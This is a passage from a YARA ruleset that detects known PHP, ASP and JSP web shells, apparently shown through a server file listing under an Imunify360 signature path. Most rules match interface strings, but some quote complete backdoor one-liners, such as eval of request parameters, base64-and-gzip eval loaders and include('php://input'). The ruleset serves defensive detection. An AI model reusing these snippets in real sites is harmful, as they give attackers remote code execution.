Current Path : /var/imunify360/files/sigs/v1/heuristic/ |
Current File : //var/imunify360/files/sigs/v1/heuristic/webshells.yara |
/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Weevely_Webshell { meta: description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell" author = "Florian Roth" reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html" date = "2014/12/14" score = 60 strings: $php = "<?php" ascii $s0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii $s1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii $s2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii $s4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii condition: $php at 0 and all of ($s*) and filesize > 570 and filesize < 800 } rule webshell_h4ntu_shell_powered_by_tsoi_ { meta: description = "Web Shell - file h4ntu shell [powered by tsoi].php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "06ed0b2398f8096f1bebf092d0526137" strings: $s0 = " <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b" $s3 = " <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui" $s4 = " <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= " $s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($" condition: all of them } rule webshell_PHP_sql { meta: description = "Web Shell - file sql.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "2cf20a207695bbc2311a998d1d795c35" strings: $s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_" $s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&" condition: all of them } rule webshell_PHP_a { meta: description = "Web Shell - file a.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "e3b461f7464d81f5022419d87315a90d" strings: $s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"" $s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>" $s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword condition: 2 of them } rule webshell_iMHaPFtp_2 { meta: description = "Web Shell - file iMHaPFtp.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "12911b73bc6a5d313b494102abcf5c57" strings: $s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&file=' . urlencode($" $s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA" condition: 1 of them } rule webshell_Jspspyweb { meta: description = "Web Shell - file Jspspyweb.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "4e9be07e95fff820a9299f3fb4ace059" strings: $s0 = " out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7" $s3 = " \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control" condition: all of them } rule webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 { meta: description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "49ad9117c96419c35987aaa7e2230f63" strings: $s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n" $s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color" condition: 1 of them } rule webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend { meta: description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "089ff24d978aeff2b4b2869f0c7d38a3" strings: $s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo" $s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim" condition: 1 of them } rule webshell_phpshell_2_1_pwhash { meta: description = "Web Shell - file pwhash.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "ba120abac165a5a30044428fac1970d8" strings: $s1 = "<tt> </tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi" $s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\"," condition: 1 of them } rule webshell_PHPRemoteView { meta: description = "Web Shell - file PHPRemoteView.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "29420106d9a81553ef0d1ca72b9934d9" strings: $s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'" $s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u" condition: 1 of them } rule webshell_jsp_12302 { meta: description = "Web Shell - file 12302.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a3930518ea57d899457a62f372205f7f" strings: $s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword $s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" condition: all of them } rule webshell_caidao_shell_guo { meta: description = "Web Shell - file guo.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "9e69a8f499c660ee0b4796af14dc08f0" strings: $s0 = "<?php ($www= $_POST['ice'])!" $s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww" condition: 1 of them } rule webshell_PHP_redcod { meta: description = "Web Shell - file redcod.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "5c1c8120d82f46ff9d813fbe3354bac5" strings: $s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword $s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword condition: all of them } rule webshell_remview_fix { meta: description = "Web Shell - file remview_fix.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a24b7c492f5f00e2a19b0fa2eb9c3697" strings: $s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u" $s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n" condition: 1 of them } rule webshell_asp_cmd { meta: description = "Web Shell - file cmd.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "895ca846858c315a3ff8daa7c55b3119" strings: $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword $s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword condition: 1 of them } rule webshell_php_sh_server { meta: description = "Web Shell - file server.php" author = "Florian Roth" date = "2014/01/28" score = 50 hash = "d87b019e74064aa90e2bb143e5e16cfa" strings: $s0 = "eval(getenv('HTTP_CODE'));" fullword condition: all of them } rule webshell_PH_Vayv_PH_Vayv { meta: description = "Web Shell - file PH Vayv.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "35fb37f3c806718545d97c6559abd262" strings: $s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in" $s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style" condition: 1 of them } rule webshell_caidao_shell_ice { meta: description = "Web Shell - file ice.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "6560b436d3d3bb75e2ef3f032151d139" strings: $s0 = "<%eval request(\"ice\")%>" fullword condition: all of them } rule webshell_cihshell_fix { meta: description = "Web Shell - file cihshell_fix.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "3823ac218032549b86ee7c26f10c4cb5" strings: $s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty" $s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos" condition: 1 of them } rule webshell_asp_shell { meta: description = "Web Shell - file shell.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "e63f5a96570e1faf4c7b8ca6df750237" strings: $s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword $s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword condition: all of them } rule webshell_Private_i3lue { meta: description = "Web Shell - file Private-i3lue.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "13f5c7a035ecce5f9f380967cf9d4e92" strings: $s8 = "case 15: $image .= \"\\21\\0\\" condition: all of them } rule webshell_php_up { meta: description = "Web Shell - file up.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "7edefb8bd0876c41906f4b39b52cd0ef" strings: $s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword $s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword $s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword condition: 2 of them } rule webshell_Mysql_interface_v1_0 { meta: description = "Web Shell - file Mysql interface v1.0.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a12fc0a3d31e2f89727b9678148cd487" strings: $s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return" condition: all of them } rule webshell_php_s_u { meta: description = "Web Shell - file s-u.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "efc7ba1a4023bcf40f5e912f1dd85b5a" strings: $s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea" condition: all of them } rule webshell_phpshell_2_1_config { meta: description = "Web Shell - file config.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "bd83144a649c5cc21ac41b505a36a8f3" strings: $s1 = "; (choose good passwords!). Add uses as simple 'username = \"password\"' lines." fullword condition: all of them } rule webshell_asp_EFSO_2 { meta: description = "Web Shell - file EFSO_2.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a341270f9ebd01320a7490c12cb2e64c" strings: $s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB" condition: all of them } rule webshell_jsp_up { meta: description = "Web Shell - file up.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "515a5dd86fe48f673b72422cccf5a585" strings: $s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword condition: all of them } rule webshell_NetworkFileManagerPHP { meta: description = "Web Shell - file NetworkFileManagerPHP.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "acdbba993a5a4186fd864c5e4ea0ba4f" strings: $s9 = " echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted " condition: all of them } rule webshell_Server_Variables { meta: description = "Web Shell - file Server Variables.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "47fb8a647e441488b30f92b4d39003d7" strings: $s7 = "<% For Each Vars In Request.ServerVariables %>" fullword $s9 = "Variable Name</B></font></p>" fullword condition: all of them } rule webshell_caidao_shell_ice_2 { meta: description = "Web Shell - file ice.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "1d6335247f58e0a5b03e17977888f5f2" strings: $s0 = "<?php ${${eval($_POST[ice])}};?>" fullword condition: all of them } rule webshell_caidao_shell_mdb { meta: description = "Web Shell - file mdb.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "fbf3847acef4844f3a0d04230f6b9ff9" strings: $s1 = "<% execute request(\"ice\")%>a " fullword condition: all of them } rule webshell_jsp_guige { meta: description = "Web Shell - file guige.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "2c9f2dafa06332957127e2c713aacdd2" strings: $s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null" condition: all of them } rule webshell_phpspy2010 { meta: description = "Web Shell - file phpspy2010.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "14ae0e4f5349924a5047fed9f3b105c5" strings: $s3 = "eval(gzinflate(base64_decode(" $s5 = "//angel" fullword $s8 = "$admin['cookiedomain'] = '';" fullword condition: all of them } rule webshell_asp_ice { meta: description = "Web Shell - file ice.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d141e011a92f48da72728c35f1934a2b" strings: $s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC" condition: all of them } rule webshell_drag_system { meta: description = "Web Shell - file system.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "15ae237cf395fb24cf12bff141fb3f7c" strings: $s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_" condition: all of them } rule webshell_DarkBlade1_3_asp_indexx { meta: description = "Web Shell - file indexx.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "b7f46693648f534c2ca78e3f21685707" strings: $s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou" condition: all of them } rule webshell_phpshell3 { meta: description = "Web Shell - file phpshell3.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "76117b2ee4a7ac06832d50b2d04070b8" strings: $s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];" $s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna" $s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword condition: 2 of them } rule webshell_jsp_hsxa { meta: description = "Web Shell - file hsxa.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d0e05f9c9b8e0b3fa11f57d9ab800380" strings: $s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja" condition: all of them } rule webshell_jsp_utils { meta: description = "Web Shell - file utils.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "9827ba2e8329075358b8e8a53e20d545" strings: $s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z" condition: all of them } rule webshell_asp_01 { meta: description = "Web Shell - file 01.asp" author = "Florian Roth" date = "2014/01/28" score = 50 hash = "61a687b0bea0ef97224c7bd2df118b87" strings: $s0 = "<%eval request(\"pass\")%>" fullword condition: all of them } rule webshell_asp_404 { meta: description = "Web Shell - file 404.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d9fa1e8513dbf59fa5d130f389032a2d" strings: $s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2" condition: all of them } rule webshell_webshell_cnseay02_1 { meta: description = "Web Shell - file webshell-cnseay02-1.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "95fc76081a42c4f26912826cb1bd24b1" strings: $s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU" condition: all of them } rule webshell_php_fbi { meta: description = "Web Shell - file fbi.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "1fb32f8e58c8deb168c06297a04a21f1" strings: $s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo" condition: all of them } rule webshell_B374kPHP_B374k { meta: description = "Web Shell - file B374k.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "bed7388976f8f1d90422e8795dff1ea6" strings: $s0 = "Http://code.google.com/p/b374k-shell" fullword $s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'" $s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword $s4 = "B374k Vip In Beautify Just For Self" fullword condition: 1 of them } rule webshell_cmd_asp_5_1 { meta: description = "Web Shell - file cmd-asp-5.1.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "8baa99666bf3734cbdfdd10088e0cd9f" strings: $s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword condition: all of them } rule webshell_php_dodo_zip { meta: description = "Web Shell - file zip.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "b7800364374077ce8864796240162ad5" strings: $s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x" $s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" condition: all of them } rule webshell_aZRaiLPhp_v1_0 { meta: description = "Web Shell - file aZRaiLPhp v1.0.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "26b2d3943395682e36da06ed493a3715" strings: $s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($" $s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo" condition: all of them } rule webshell_php_list { meta: description = "Web Shell - file list.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "922b128ddd90e1dc2f73088956c548ed" strings: $s1 = "// list.php = Directory & File Listing" fullword $s2 = " echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena" $s9 = "// by: The Dark Raver" fullword condition: 1 of them } rule webshell_ironshell { meta: description = "Web Shell - file ironshell.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "8bfa2eeb8a3ff6afc619258e39fded56" strings: $s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\"" $s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di" condition: all of them } rule webshell_caidao_shell_404 { meta: description = "Web Shell - file 404.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "ee94952dc53d9a29bdf4ece54c7a7aa7" strings: $s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St" condition: all of them } rule webshell_ASP_aspydrv { meta: description = "Web Shell - file aspydrv.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "de0a58f7d1e200d0b2c801a94ebce330" strings: $s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi" condition: all of them } rule webshell_jsp_web { meta: description = "Web Shell - file web.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "4bc11e28f5dccd0c45a37f2b541b2e98" strings: $s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request." condition: all of them } rule webshell_mysqlwebsh { meta: description = "Web Shell - file mysqlwebsh.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "babfa76d11943a22484b3837f105fada" strings: $s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#" condition: all of them } rule webshell_jspShell { meta: description = "Web Shell - file jspShell.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1" strings: $s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on" $s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;" condition: all of them } rule webshell_Dx_Dx { meta: description = "Web Shell - file Dx.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "9cfe372d49fe8bf2fac8e1c534153d9b" strings: $s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx" $s9 = "class=linelisting><nobr>POST (php eval)</td><" condition: 1 of them } rule webshell_asp_ntdaddy { meta: description = "Web Shell - file ntdaddy.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "c5e6baa5d140f73b4e16a6cfde671c68" strings: $s9 = "if FP = \"RefreshFolder\" or " $s10 = "request.form(\"cmdOption\")=\"DeleteFolder\" " condition: 1 of them } rule webshell_MySQL_Web_Interface_Version_0_8 { meta: description = "Web Shell - file MySQL Web Interface Version 0.8.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "36d4f34d0a22080f47bb1cb94107c60f" strings: $s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>" condition: all of them } rule webshell_elmaliseker_2 { meta: description = "Web Shell - file elmaliseker.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "b32d1730d23a660fd6aa8e60c3dc549f" strings: $s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx" $s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but" condition: all of them } rule webshell_ASP_RemExp { meta: description = "Web Shell - file RemExp.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "aa1d8491f4e2894dbdb91eec1abc2244" strings: $s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques" $s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal" condition: all of them } rule webshell_jsp_list1 { meta: description = "Web Shell - file list1.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6" strings: $s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive" $s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\"" condition: all of them } rule webshell_phpkit_1_0_odd { meta: description = "Web Shell - file odd.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "594d1b1311bbef38a0eb3d6cbb1ab538" strings: $s0 = "include('php://input');" fullword $s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword $s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword condition: all of them } rule webshell_jsp_123 { meta: description = "Web Shell - file 123.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "c691f53e849676cac68a38d692467641" strings: $s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7" $s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" $s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\"> " fullword condition: all of them } rule webshell_asp_1 { meta: description = "Web Shell - file 1.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "8991148adf5de3b8322ec5d78cb01bdb" strings: $s4 = "!22222222222222222222222222222222222222222222222222" fullword $s8 = "<%eval request(\"pass\")%>" fullword condition: all of them } rule webshell_ASP_tool { meta: description = "Web Shell - file tool.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "4ab68d38527d5834e9c1ff64407b34fb" strings: $s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\"" $s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b><DIR> <a href='\" " $s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas" condition: 2 of them } rule webshell_cmd_win32 { meta: description = "Web Shell - file cmd_win32.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "cc4d4d6cc9a25984aa9a7583c7def174" strings: $s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam" $s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword condition: 2 of them } rule webshell_jsp_jshell { meta: description = "Web Shell - file jshell.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "124b22f38aaaf064cef14711b2602c06" strings: $s0 = "kXpeW[\"" fullword $s4 = "[7b:g0W@W<" fullword $s5 = "b:gHr,g<" fullword $s8 = "RhV0W@W<" fullword $s9 = "S_MR(u7b" fullword condition: all of them } rule webshell_ASP_zehir4 { meta: description = "Web Shell - file zehir4.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "7f4e12e159360743ec016273c3b9108c" strings: $s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/" condition: all of them } rule webshell_wsb_idc { meta: description = "Web Shell - file idc.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "7c5b1b30196c51f1accbffb80296395f" strings: $s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword $s3 = "{eval($_GET['idc']);}" fullword condition: 1 of them } rule webshell_cpg_143_incl_xpl { meta: description = "Web Shell - file cpg_143_incl_xpl.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "5937b131b67d8e0afdbd589251a5e176" strings: $s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA" $s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time" condition: 1 of them } rule webshell_mumaasp_com { meta: description = "Web Shell - file mumaasp.com.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "cce32b2e18f5357c85b6d20f564ebd5d" strings: $s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR" condition: all of them } rule webshell_php_404 { meta: description = "Web Shell - file 404.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "ced050df5ca42064056a7ad610a191b3" strings: $s0 = "$pass = md5(md5(md5($pass)));" fullword condition: all of them } rule webshell_webshell_cnseay_x { meta: description = "Web Shell - file webshell-cnseay-x.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a0f9f7f5cd405a514a7f3be329f380e5" strings: $s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_" condition: all of them } rule webshell_asp_up { meta: description = "Web Shell - file up.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "f775e721cfe85019fe41c34f47c0d67c" strings: $s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio" $s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword condition: 1 of them } rule webshell_phpkit_0_1a_odd { meta: description = "Web Shell - file odd.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "3c30399e7480c09276f412271f60ed01" strings: $s1 = "include('php://input');" fullword $s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword $s4 = "// uses include('php://input') to execute arbritary code" fullword $s5 = "// php://input based backdoor" fullword condition: 2 of them } rule webshell_ASP_cmd { meta: description = "Web Shell - file cmd.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "97af88b478422067f23b001dd06d56a9" strings: $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword condition: all of them } rule webshell_PHP_Shell_x3 { meta: description = "Web Shell - file PHP Shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a2f8fa4cce578fc9c06f8e674b9e63fd" strings: $s4 = " <?php echo buildUrl(\"<font color=\\\"navy\\\">[" $s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input" $s9 = "if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(" condition: 2 of them } rule webshell_PHP_g00nv13 { meta: description = "Web Shell - file g00nv13.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "35ad2533192fe8a1a76c3276140db820" strings: $s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas" $s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p" condition: all of them } rule webshell_php_h6ss { meta: description = "Web Shell - file h6ss.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "272dde9a4a7265d6c139287560328cd5" strings: $s0 = "<?php eval(gzuncompress(base64_decode(\"" condition: all of them } rule webshell_jsp_zx { meta: description = "Web Shell - file zx.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "67627c264db1e54a4720bd6a64721674" strings: $s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g" condition: all of them } rule webshell_Ani_Shell { meta: description = "Web Shell - file Ani-Shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "889bfc9fbb8ee7832044fc575324d01a" strings: $s0 = "$Python_CODE = \"I" $s6 = "$passwordPrompt = \"\\n=================================================" $s7 = "fputs ($sockfd ,\"\\n===============================================" condition: 1 of them } rule webshell_jsp_k8cmd { meta: description = "Web Shell - file k8cmd.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "b39544415e692a567455ff033a97a682" strings: $s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword condition: all of them } rule webshell_jsp_cmd { meta: description = "Web Shell - file cmd.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "5391c4a8af1ede757ba9d28865e75853" strings: $s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword condition: all of them } rule webshell_jsp_k81 { meta: description = "Web Shell - file k81.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "41efc5c71b6885add9c1d516371bd6af" strings: $s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword $s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword condition: 1 of them } rule webshell_ASP_zehir { meta: description = "Web Shell - file zehir.asp" author = "Florian Roth" date = "2014/01/28" score = 70 